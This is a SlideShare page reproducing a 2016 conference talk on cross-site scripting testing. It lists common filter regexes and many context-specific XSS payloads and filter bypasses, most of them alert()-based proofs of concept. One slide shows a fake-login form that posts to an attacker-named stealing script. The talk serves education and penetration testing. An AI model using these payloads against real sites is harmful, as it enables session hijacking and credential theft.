SlideShare une entreprise Scribd logo

Non-Esoteric XSS Tips & Tricks

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "Non-Esoteric XSS Tips & Tricks" held at FSec 2016 (Croatia / Varazdin 15th September 2016) by Miroslav Stampar

Technologie
1  sur  27
Télécharger pour lire hors ligne
Non-Esoteric XSSNon-Esoteric XSS Tips & TricksTips & Tricks Miroslav Štampar (mstampar@zsis.hr; miroslav@sqlmap.org) Non-Esoteric XSSNon-Esoteric XSS Tips & TricksTips & Tricks Miroslav Štampar (mstampar@zsis.hr; miroslav@sqlmap.org)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2 XSS (Cross-Site Scripting)XSS (Cross-Site Scripting) Injection attack against usersagainst users of (otherwise) benign and trusted web sites Used mostly in targetedtargeted attacks (e.g. spear- phishing against administrators) For example, an attacker can send a link with malicious JavascriptJavascript (JS) code to an unsuspecting user The user’s browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within browsing contextwithin browsing context
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 3 Real-world (known) casesReal-world (known) cases
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 4 More about vulnerabilityMore about vulnerability Considered as criticalcritical vulnerability, hence (often) well paid in bug bounty programs Failure to (properly) sanitize/filtersanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability While testing, responses for user supplied values are being inspected for signs of the vulnerability (e.g. response returning values in originaloriginal form) Provoking JS pop-up boxpop-up box with custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of vulnerability Types: storedstored (persisting), reflectedreflected (temporary) and DOM-basedDOM-based (in-browser)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 5 Food for thought :)Food for thought :)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 6 Testing workflowTesting workflow 1) Find reflecting inputinput points (e.g. page's GET parameter values) 2) Recognize contextcontext of reflection (e.g. inside <script>...</script>) 3) BypassBypass sanitization/filtering and/or protection mechanism(s) (Note: if possible and/or required) 4) Write vulnerability exploitation PoCPoC (e.g. ...alert('XSS')...)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 7 Practical example (PoC)Practical example (PoC)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 8 Protection mechanism(s)Protection mechanism(s) Common (XSS) detection regular expressions: ● /<[a­z]/i - (e.g.) <svg, <img - though, there are cases where “benign” tags as <a> are left un- blacklisted ● /b(java)?scriptb/i - (e.g.) <script, <img  src="javascript:, etc. ● /bonw+s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted ● /bsrcs*=/i - (e.g.) <embed src=..., etc. ● /bw+(/i - (e.g.) alert( - though, there are cases where confirm( is left un-blacklisted
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 9 Sanitization mechanism(s)Sanitization mechanism(s) Common (XSS) server response sanitizations: ● Removing all special characters - (e.g.) foo<'">bar → foobar ● Replacing with whitespace all special characters - (e.g.) foo<'">bar → foo bar ● HTML named entity encoding - (e.g.) foo<'">bar → foo&lt;&apos;&quot;&gt;bar ● HTML numeric code point encoding - (e.g.) foo<'">bar → foo&#60;&#39;&#34;&#62;bar ● Backslash escaping all special characters - (e.g.) foo<'">bar → foo<'">bar (Note: <script>) ● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 10 Break-out of <tag...> context with > OR onXXX event handler injection ?vuln="><svg onload=alert(/XSS/)> ?vuln=" onclick="alert(/XSS/) Usability is highly dependent on context and available <tag> events (e.g.) Tags having visibility: hidden require breaking out of <tag...> context <tag...><tag...> ((|more|more))
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 11 <tag...><tag...> ((|more|more)) Even though attacker's options inside <tag> are pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help ?vuln=" onmouseover=alert(/XSS/)  style="display: block; position: absolute;  left: 0; top: 0; height: 10000px; width:  10000px; opacity: 0; cursor: default
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 12 >...<>...< Injecting outside of <tag> context and/or scope (e.g. </script>...) requires unfiltered < and > Proper “Content­type” (e.g. “text/html”) is required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest) ?vuln=<img src=null onerror=alert(/XSS/)> ?vuln=<script>alert(/XSS/)</script>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 13 <!­­...­­><!­­...­­> Requires breaking-out of <!­­...­­> (i.e. HTML comment) context with ­­> Common for (custom) sites with debugging support turned ON (e.g. returning used SQL query inside comment) ?vuln=­­><svg onload=alert(/XSS/)> As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[a­zA­Z] inside parameter values)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 14 <frame ...><frame ...> Injecting custom <frame> OR onload event handler injection (prefered) ?vuln="><frame  src="data:text/html;base64,PHNjcmlwdD5hbGVy dCgnWFNTJyk8L3NjcmlwdD4 ?vuln=" onload="alert(/XSS/) Note: Non-<frame> tags can't be used because of <frameset> restrictions
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 15 <iframe...><iframe...> Break-out of <iframe...> context OR onload event handler injection (prefered) ?vuln="></iframe><svg onload=alert( /XSS/)> ?vuln=" onload="alert(/XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 16 <input...><input...> Break-out of <input...> context with > OR  onfocus event handler injection (prefered) ?vuln=1"><svg onload=alert(/XSS/)> ?vuln=1" autofocus onfocus="alert(/XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 17 <input type<input type="hidden"="hidden"...>...> In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (Alt­ Shift­<key>) ?vuln=" accesskey="X" onclick="alert(  /XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 18 <script>...</script><script>...</script> Break-out of <script>...</script> with </script> OR in-place JS injection (prefered) ?vuln=</script><svg onload=alert(/XSS/)> ?vuln=foobar');alert('XSS');var dummy=(' Common in third-party advertisement plugins Note: In-place JS injection doesn't require <>, though it requires unfiltered ' or " in majority of cases (interpreter syntax checksinterpreter syntax checks)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 19 echo $_SERVER['PHP_SELF']echo $_SERVER['PHP_SELF'] Common finding even on top sites and/or frameworks Non-sanitized reference of current script's path http://...php/"><svg onload="alert(/XSS/) Not PHP-specific (though more common) Note: JS injection in path often require manual URL encoding of non-alphanumeric characters
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 20 <meta><meta> Often mislooked, though easy to exploit Top sites tend to utilize lots of metadata ?vuln="><script>alert(/XSS/)</script> ?vuln=0;url=data:text/html;base64,  PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4"  http­equiv="refresh
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 21 <textarea> <textarea> andand <title> <title> Injection into <textarea> and <title> enclosings require explicit (respectable) closing tagsclosing tags (i.e. </textarea> and </title>) Important to note because of automatized scanners (majority don't check the context) <style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used ?vuln=</textarea><svg onload=alert(/XSS/)>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 22 $_POST$_POST Though not exploitable directly from link (i.e. address bar), it is a perfectly valid attack point Requires malicious HTMLmalicious HTML document that has to be loaded inside the victim's web browser Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 23 Protection(s) bypasses (Protection(s) bypasses (|more|more)) <svg/onload=alert(/XSS/)> prompt`XSS` onerror=confirm;throw/XSS/; document.write(String.fromCharCode(60,  115,99,114,105,112,116,62,97,... [][(![]+[])[+[]]+([![]]+[][... // JSFuck <SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT> <embed src=data:image/svg+xml;base64, PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM... <object data=data:text/html;base64,... <video/poster/onerror=alert(/XSS/)> </i/style=left:expression(alert('XSS'))>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 24 Protection(s) bypasses (Protection(s) bypasses (|more|more)) <iframe src=javascript:alert('XSS')> <isindex type=submit formaction=&#106 &#97&#118&#97&#115&#99&#114&#105&#112... <isindex type=image src=null  onerror=alert(/XSS/)> <iframe/srcdoc=&lt;svg&sol;onload&equals; alert&lpar;&quot;XSS&quot;&rpar;&gt;> <img src=null  onerror=u0061u006cu0065u0072u0074&lpar ;&quot;u0058u0053u0053&quot;&rpar;> <body style=height:9999px  onwheel=prompt(/XSS/)> <marquee onstart=confirm(/XSS/)>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 25 In cases when Javascript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever “Evil link” scenario – (e.g.) “Fake login” scenario – (e.g.) <form action="//www.attacker.com/steal.php">... “Fake defacement” scenario – (e.g.) <h1>This site has been hacked by l33tcr3w</h1> p.s. HTML injectionp.s. HTML injection
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 26 www.openbugbounty.org html5sec.org p.p.s. Recommended resourcesp.p.s. Recommended resources
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 27 Questions?Questions?

Recommandé

Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
CONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiCONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiPROIDEA
 
Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Logicaltrust pl
 
Testing NodeJS Security
Testing NodeJS SecurityTesting NodeJS Security
Testing NodeJS SecurityJose Manuel Ortega Candel
 
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.js
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.jsJS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.js
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.jsJSFestUA
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 

Recommandé

Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
CONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiCONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiPROIDEA
 
Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Logicaltrust pl
 
Testing NodeJS Security
Testing NodeJS SecurityTesting NodeJS Security
Testing NodeJS SecurityJose Manuel Ortega Candel
 
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.js
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.jsJS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.js
JS Fest 2019. Тимур Шемсединов. Разделяемая память в многопоточном Node.jsJSFestUA
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS AttackMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)arlenis camacho
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Ladies waterproof head scarf
Ladies waterproof head scarfLadies waterproof head scarf
Ladies waterproof head scarfshopkrysi47
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLiMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the BufferMiroslav Stampar
 
Product: UPS: FirstLine P
Product: UPS: FirstLine PProduct: UPS: FirstLine P
Product: UPS: FirstLine PStaco Energy
 
COMANDOS DEL TECLADO
COMANDOS DEL TECLADOCOMANDOS DEL TECLADO
COMANDOS DEL TECLADOMichael Sanchez SB
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Product: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRProduct: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRStaco Energy
 
Computador
ComputadorComputador
ComputadorArgos Tecnologias
 
Product: UPS: UniStar V
Product: UPS: UniStar VProduct: UPS: UniStar V
Product: UPS: UniStar VStaco Energy
 
Evolución histórica de la Criminología
Evolución histórica de la CriminologíaEvolución histórica de la Criminología
Evolución histórica de la CriminologíaAdelaida Tassoni
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatRomanian Cyber Conference
 

Contenu connexe

En vedette

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)arlenis camacho
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Ladies waterproof head scarf
Ladies waterproof head scarfLadies waterproof head scarf
Ladies waterproof head scarfshopkrysi47
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Product: UPS: FirstLine P
Product: UPS: FirstLine PProduct: UPS: FirstLine P
Product: UPS: FirstLine PStaco Energy
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Product: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRProduct: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRStaco Energy
 
Product: UPS: UniStar V
Product: UPS: UniStar VProduct: UPS: UniStar V
Product: UPS: UniStar VStaco Energy
 
Evolución histórica de la Criminología
Evolución histórica de la CriminologíaEvolución histórica de la Criminología
Evolución histórica de la CriminologíaAdelaida Tassoni
 

En vedette (20)

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologia
 
Ladies waterproof head scarf
Ladies waterproof head scarfLadies waterproof head scarf
Ladies waterproof head scarf
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologia
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Product: UPS: FirstLine P
Product: UPS: FirstLine PProduct: UPS: FirstLine P
Product: UPS: FirstLine P
 
COMANDOS DEL TECLADO
COMANDOS DEL TECLADOCOMANDOS DEL TECLADO
COMANDOS DEL TECLADO
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
 
Product: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRProduct: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVR
 
Computador
ComputadorComputador
Computador
 
Product: UPS: UniStar V
Product: UPS: UniStar VProduct: UPS: UniStar V
Product: UPS: UniStar V
 
Evolución histórica de la Criminología
Evolución histórica de la CriminologíaEvolución histórica de la Criminología
Evolución histórica de la Criminología
 

Similaire à Non-Esoteric XSS Tips & Tricks

Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
15 owasp top 10 - a3-xss
15 owasp top 10 - a3-xss15 owasp top 10 - a3-xss
15 owasp top 10 - a3-xssappsec
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Introducing Malware Script Detector
Introducing Malware Script DetectorIntroducing Malware Script Detector
Introducing Malware Script Detectorguest31a5be
 
Introducing Msd
Introducing MsdIntroducing Msd
Introducing MsdAung Khant
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server sidecuteboysmith
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 

Similaire à Non-Esoteric XSS Tips & Tricks (20)

Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
15 owasp top 10 - a3-xss
15 owasp top 10 - a3-xss15 owasp top 10 - a3-xss
15 owasp top 10 - a3-xss
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerability
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
XSS Injection Vulnerabilities
XSS Injection VulnerabilitiesXSS Injection Vulnerabilities
XSS Injection Vulnerabilities
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Introducing Malware Script Detector
Introducing Malware Script DetectorIntroducing Malware Script Detector
Introducing Malware Script Detector
 
Introducing Msd
Introducing MsdIntroducing Msd
Introducing Msd
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server side
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 

Plus de Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 

Plus de Miroslav Stampar (9)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 

Dernier

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
